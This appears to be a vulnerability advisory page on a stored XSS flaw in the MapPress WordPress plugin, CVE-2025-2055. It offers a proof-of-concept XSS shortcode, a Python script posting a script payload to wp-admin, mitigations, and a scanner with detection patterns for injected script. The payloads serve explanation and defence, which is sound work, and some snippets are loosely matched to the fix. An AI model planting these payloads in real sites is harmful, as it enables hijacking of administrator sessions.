How CVE-2025-2055 Works
The MapPress Maps plugin for WordPress (versions before 2.94.9) fails to sanitize user-supplied input when rendering map parameters on WordPress pages. Users with the Contributor role or higher can inject malicious JavaScript through unsanitized shortcode parameters. When an administrator views a page containing the tainted map, the script executes in the administrator's session context, potentially leading to privilege escalation, cookie theft, or full admin takeover. The root cause is improper output encoding in the frontend rendering function that processes shortcode attributes.
DailyCVE Form
Platform: WordPress
Version: <2.94.9
Vulnerability: Stored XSS
Severity: Medium
Date: 04/03/2025
What Undercode Say:
// Proof-of-concept XSS payload for MapPress (shortcode attribute)
[mappress mapid="1" html='<img src=x onerror=alert(document.cookie)>']

// Check vulnerable versions (WP-CLI)
wp plugin list --fields=name,version | grep mappress

// Patch verification: nonce check on the request (the XSS fix itself is output encoding in the render function)
if (!wp_verify_nonce($_POST['mappress_params'], 'mappress_nonce')) {
    die('Invalid request');
}

// Temporary mitigation (nginx): block direct requests to the plugin directory
location ~ /wp-content/plugins/mappress/ {
    deny all;
}

// Database query to find affected posts
SELECT ID, post_title FROM wp_posts WHERE post_content LIKE '%[mappress %html=%]%';

// Exploit simulation (Python)
import requests

wordpress_site = "http://vulnerable-site.com"
payload = {
    'post_title': 'XSS Test',
    'post_content': '[mappress html="<script>alert(1)</script>"]',
    'post_status': 'pending',
}
requests.post(f"{wordpress_site}/wp-admin/post.php", data=payload)

// .htaccess protection
<FilesMatch "mappress\.php$">
    Require all denied
</FilesMatch>

// Client-side protection
document.addEventListener('DOMContentLoaded', function () {
    if (window.mappress) {
        Object.freeze(window.mappress.render);
    }
});

// Automated patching
wp plugin update mappress --version=2.94.9
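As an added example that is not part of the original page or the MapPress plugin, this Python script generalizes the wp_posts query above: it parses each [mappress ...] shortcode in post content, reads its attributes, and flags those whose html attribute carries active content; the sample rows and the encode_for_attribute helper (standing in for WordPress's esc_attr()) are constructed for illustration.

```python
import html
import re

# A [mappress ...] shortcode and its raw attribute string.
SHORTCODE_RE = re.compile(r"\[mappress\b([^\]]*)\]", re.IGNORECASE)
# WordPress-style shortcode attributes: key="v", key='v' or key=v.
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|(\S+))""")
# Markers of active content in an attribute: script tags, inline event handlers, javascript: URLs.
DANGEROUS_RE = re.compile(r"<\s*script|\bon\w+\s*=|javascript\s*:", re.IGNORECASE)

def parse_attrs(attr_string):
    """Return shortcode attributes as a dict; a repeated key keeps its last value."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_string):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs

def find_suspicious_shortcodes(post_content):
    """Return (shortcode_text, attrs) for each mappress shortcode whose html attribute carries active content."""
    hits = []
    for m in SHORTCODE_RE.finditer(post_content):
        attrs = parse_attrs(m.group(1))
        if "html" in attrs and DANGEROUS_RE.search(attrs["html"]):
            hits.append((m.group(0), attrs))
    return hits

def encode_for_attribute(value):
    """The class of fix the advisory describes: output-encode before rendering (WordPress: esc_attr())."""
    return html.escape(value, quote=True)

# Constructed sample wp_posts rows (ID, post_content); not real site data.
SAMPLE_POSTS = [
    (101, 'Office map: [mappress mapid="1"]'),
    (102, "[mappress mapid=\"1\" html='<img src=x onerror=alert(document.cookie)>']"),
    (103, '[mappress mapid="2" html="<b>Visit us</b>"]'),
    (104, 'Intro [mappress html="<script>alert(1)</script>"] outro'),
]

def scan_posts(posts):
    """Return (post_id, shortcode_text) for every flagged shortcode across the rows."""
    return [(pid, hit[0]) for pid, content in posts
            for hit in find_suspicious_shortcodes(content)]

if __name__ == "__main__":
    for pid, shortcode in scan_posts(SAMPLE_POSTS):
        print(f"post {pid}: {shortcode}")
```

Run it against rows exported from wp_posts to triage hits before cleaning them; a benign html attribute (post 103) is not flagged, so review the flagged rows rather than bulk-deleting.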
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode